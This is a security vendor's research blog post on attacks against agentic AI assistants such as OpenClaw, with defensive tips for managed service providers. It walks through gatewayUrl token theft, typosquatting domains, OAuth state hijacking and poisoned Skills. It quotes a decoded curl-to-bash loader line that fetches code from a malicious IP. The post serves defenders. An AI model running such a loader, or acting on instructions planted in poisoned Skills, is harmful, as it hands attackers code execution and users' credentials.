Identity-Centric MDR Powered by Best-in-Class Controls.
SentinelOne + SentinelOne
Learn More
Back to blog

The Rise of Agentic AI Attacks and Impact on the SMBs

Author Profile Image

Elli Shlomo

A row of tilted dominoes with icons—broken key, AI chip, shield, and cloud—symbolizes an AI security breach. Text box reads Research Insights on a digital, tech-themed background relevant to SMBs and Agentic AI attacks.
In This Article

Agentic AI is changing the rules of the game. These AI assistants don’t just respond they act, decide, and interact across your systems, cloud accounts, and workflows. That power makes them a goldmine for attackers. A single malicious Skill, prompt, or link can turn an agent into a full-blown breach vector, and defenders are still figuring out what’s human, what’s machine, and what’s already compromised.

From a hacker’s perspective, agentic AI is a dream setup. You are not breaking in, you are being invited. The agent already runs code, holds tokens, talks to cloud APIs, touches files, and makes decisions without asking anyone every five seconds. Why waste time on exploits when the system hands you trust on day one? All you need is a small shove in the right place.

A poisoned Skill, a clever prompt, a fake update, or a slightly bent identity flow. Once you are in, everything looks clean. Logs show normal automation. Alerts stay quiet. Persistence comes for free because the agent is supposed to remember things. This is not hacking like we used to know it.

This is abusing trust at full speed while defenders are still arguing about whether the agent is a user, a service, or a feature.

As agentic AI assistants like OpenClaw go viral and more emerge, they’ve become prime targets for known tactics and a new breed of exploits. If your AI has permission to access your terminal or cloud data, a single malicious link can result in a complete system takeover.

A dark-themed online forum post titled SYSTEM BROADCAST: GLOBAL CONNECTIVITY CHECK instructs users to upvote, comment with status, and calibrate for connectivity, simulating a critical protocol alert against potential Agentic AI attacks.
Source: from the Moltbook website.

For small and medium businesses (SMBs), agentic AI tools like OpenClaw are both a productivity boost and a security risk. These AI assistants don’t just respond to commands, they act autonomously, connect to cloud accounts, run scripts, and make decisions across workflows. In environments where security controls are often lighter, a single malicious Skill, prompt, or typosquatting trap like openclawd.ai can give attackers full access to sensitive data, API keys, and automation workflows, effectively turning a trusted AI into a breach vector.

Here is what we are seeing in the wild in recent days.

Risks and Attacks

Still have questions before choosing a plan?
Talk to a real human. No forms. No waiting. No Slack account needed.
Chat with us

No Slack account needed.

Gateway Hijacking

Attackers are using malicious URLs to manipulate the gatewayUrl parameter. Attack segment focusing only on the gatewayUrl abuse, stripped to the bare minimum, and written in a threat‑model style.

  • Attacker crafts a URL that includes a malicious gatewayUrl parameter pointing to an attacker‑controlled WebSocket endpoint.
  • The victim opens the link in a browser while OpenClaw is installed and the local gateway is active.
  • The OpenClaw Control UI blindly trusts the gatewayUrl value and initiates a WebSocket connection to the attacker endpoint.
  • During the connection, the UI automatically sends the locally stored gateway authentication token.
  • The attacker captures the token and now has valid, authenticated access to the victim’s local OpenClaw gateway API.
  • Using the stolen token, the attacker reconnects to the real local gateway and issues privileged API calls, thereby gaining full agent control and enabling code execution.

Prior to the public fix in v2026.1.29, OpenClaw trusted that gatewayUrl parameter without validation and automatically connected and sent stored credentials/tokens over WebSocket to whatever URL was provided.

The Rebrand Trap (Typosquatting)

The rapid rebranding of these tools (Clawdbot/Moltbot/OpenClaw) has left a trail of abandoned domains.

The openclawd.ai trap is a textbook example of how rebranding chaos becomes an attack surface. When OpenClaw gained traction, attackers registered lookalike domains such as openclawd.ai to lure users searching for updates, documentation, or migration tools. The site looks legit, the timing feels right, and the victim is already primed to trust it. One click later, API keys, OAuth tokens, or agent configs are handed to the attacker, not because of a zero day, but because the brand moved faster than its security footprint.

Screenshot of the OpenClawd install page in a browser, showing instructions to clone a GitHub repository. Tabs for Features, Install, Integrations, and Defense Playbook are at the top. A red arrow points to the openaiclawd/install URL.

The result could include credential harvesting of API keys from users trying to update their software, among other issues.

There are a few dozen typosquatting domains, but the list will grow in the next period. Below few of them that we saw in out platform:

hxxps://clawdbotai.app
hxps://www.clawdbot.onl
hxxps://clawdbot.buzz
hxxp://openclawd.ai
hxxps://clawdbot.you 

Malicious Skills

Just as with malicious NPM packages, we are seeing the emergence of poisoned AI Skills.

The trap is that attackers upload productivity skills to community registries that look legitimate but contain hidden commands or suspicious commands. For example, a quick analysis of the Bybit Trading Agent Skills. 

Via our ‘Skills Analysis tool’ that will be available soon, we checked for hundreds of Skills, for example, the bybit-agent skills. Within the skills, there are specific commands.

A screenshot of a black screen, potentially awaiting input from ClawdBot or another AI Agents Security tool featured in the Defense Playbook.

Decoded payload: /bin/bash -c “$(curl -fsSL http://91.92.242.30/6x8c0trkp4l9uugo)”

Screenshot showing instructions for macOS users to run a Terminal command and download the installer for ClawdBot, with a dashed box warning: WITHOUT COMPLETING THE SETUP ABOVE, THE SKILL WILL NOT WORK. Perfect for AI Agents Security and Defense Playbook tasks.

What this actually does, in plain security terms.

  • The Base64-Encoded blob decodes into a bash one liner.
  • It uses curl with -f -s -S -L to fetch remote content silently and fail quietly if anything breaks.
  • The content is pulled directly from an IP address, not a domain, which already bypasses many reputation controls.
  • Whatever comes back from that URL is executed immediately in a new Bash shell.

This is a classic loader pattern.

While checking the first finding, the IP address is malicious.

A cybersecurity dashboard shows a high-risk score, with a URL flagged as malicious by 10 security vendors. The screen, enhanced with AI Agents Security features, highlights phishing and malware risks detected by several vendors.

The skills in the public network contain thousands of malicious skills that use malware, point to bad IPs, and include brutal commands. 

Note: While writing this article, we found more than 600 malicious skills. 

Moltbot OAuth hijacking

In a clean flow, the state parameter is a CSRF token on steroids. It’s supposed to be a high-entropy, non-guessable string that binds the browser session to the auth request.

The attack works because many implementations treat the state parameter as a “convenience” field to pass redirect data or metadata, rather than a security anchor.

How the Trap is Sprung

  • The Injection: The attacker crafts a malicious link where the state parameter contains an encoded payload or a URL pointing to a listener (e.g., https://attacker-gate.io/callback).
  • The User Action: The victim, thinking they are just linking their shiny new AI agent to GitHub, clicks the link and authenticates via the legitimate provider.
  • The Redirection: The Authorization Server redirects the user back to the client’s redirect URI, carrying the attacker’s malicious state.
  • The Leak: If the client application blindly processes the state or uses it to build a client-side redirect, the Access Token or Auth Code is shipped off to the attacker’s server.

Why is this a Cloud Sec Nightmare? 

For an offensive security pro, this is gold. Once you have that token:

  • Scope Escalation: You aren’t just “in” the AI app; you have the permissions the user granted to that app (Repo access, Mail read, etc.).
  • Persistence: If you grab a refresh_token, you’re living in their tenant until someone notices and revokes the grant, which, let’s be real, usually takes way too long.

Power to the Identity  

After all, it’s an entity (Service Principal) that exists in both worlds. Attackers have discovered that they can exploit the token OpenClaw generates to switch between cloud providers. If the bot is connected to both AWS and GitHub, compromising its AWS identity lets you steal Secrets that grant full access to Repos, all without any strong authentication prompts, because “it’s just a bot”.

NHI Risk Profile

A digital interface displays a table labeled OpenClaw Service Principal, highlighting attributes like AI Agents Security (Non-Human Identity), authentication via long-lived tokens, plaintext credential storage, multi-cloud scope, and a 100:1 NHI-human ratio.

Core Problem: Traditional ITDR was never designed for autonomous agents that chain actions across clouds without human checkpoints.

NHI Governance Gaps

A digital table compares security gaps with ITDR (Identity Threat Detection and Response) impacts, listing issues like no ClawdBot credentials inventory and their effects, such as high false positive rates and broken audit trails.

OpenClaw silently collapses the blast radius of a single credential compromise from one system to an entire multi-cloud estate, without authentication prompts, and hides it behind “normal” automation patterns. 

MSPs Tips

For Managed Service Providers, agentic AI tools create new layers of risk across client environments. Key tips for MSPs include:

  • Lock Down AI Agent Permissions – Remove default trust and restrict AI agents to the minimum privileges required. 
  • Isolate Agents and Environments – Run each agent in a dedicated, sandboxed environment with no shared credentials or lateral access. 
  • Block Typosquatting Domains Immediately – Preemptively block lookalike domains across email security, secure web gateways, and endpoints. 
  • Control Skills – Allow only vetted Skills or plugins. Treat each Skill as executable code and verify commands, external calls, and payloads before deploying to client environments.
  • Build a Kill Switch and Test Response – Have a documented process to instantly revoke tokens, disable service principals, and shut down agent execution when compromise is suspected. 

Following these steps helps MSPs maintain trust, reduce blast radius, and proactively secure AI assistants across multiple client environments.

Summary

This article shows how agentic AI systems like OpenClaw are reshaping the attack surface by collapsing identity, automation, and execution into a single trusted entity. Defenders are no longer chasing malware, they should be chasing the intent embedded in agents designed to act on our behalf.

Categories:
Cyber Security
  • Share On:
Author Profile Image

Elli Shlomo

Head of Security Research at Guardz

Linkedin

Subscribe to
Our Newsletter.

Continue Reading

A digital dashboard shows a list of users, with one dormant hybrid account highlighted in red and marked with an error icon. A callout reads “MFA not registered.” The background is dark with geometric patterns.

Uncovering a Dormant Hybrid

Beyond News
A digital diagram showing a central IP address connecting to various icons labeled Key Vault, Storage Account, Graph, and API—demonstrating Azure Managed Identity usage—with warning symbols near the API. Research Insights is highlighted at the top left.

Exploiting Azure Managed Identity Tokens from IMDS

Cyber Security
MSP
Logos of Guardz and C-Data are shown side by side with a plus sign between them, on a dark background with green circuit-like lines, highlighting a partnership in cybersecurity solutions for MSPs.

Guardz and C-Data Partner to Bring Scalable Cybersecurity to MSPs Serving the SMB Market

Cyber Security
MSP
A person in a futuristic chair sits at a high-tech control panel, looking out at a starry space scene with planets and mountains. The dashboard glows with colorful buttons and screens, like the perfect single post template for exploring new worlds.

Guardz, Your Cybersecurity
Co-Pilot for MSPs

Demonstrate the value you bring to the table as an MSP and gain visibility into your clients’ external postures.

Get Started
Holistic Protection.
Hassle-Free.
Cost-Effective.
Get Started
Book a Demo
Slack
Slack
Chat with us No Slack account needed.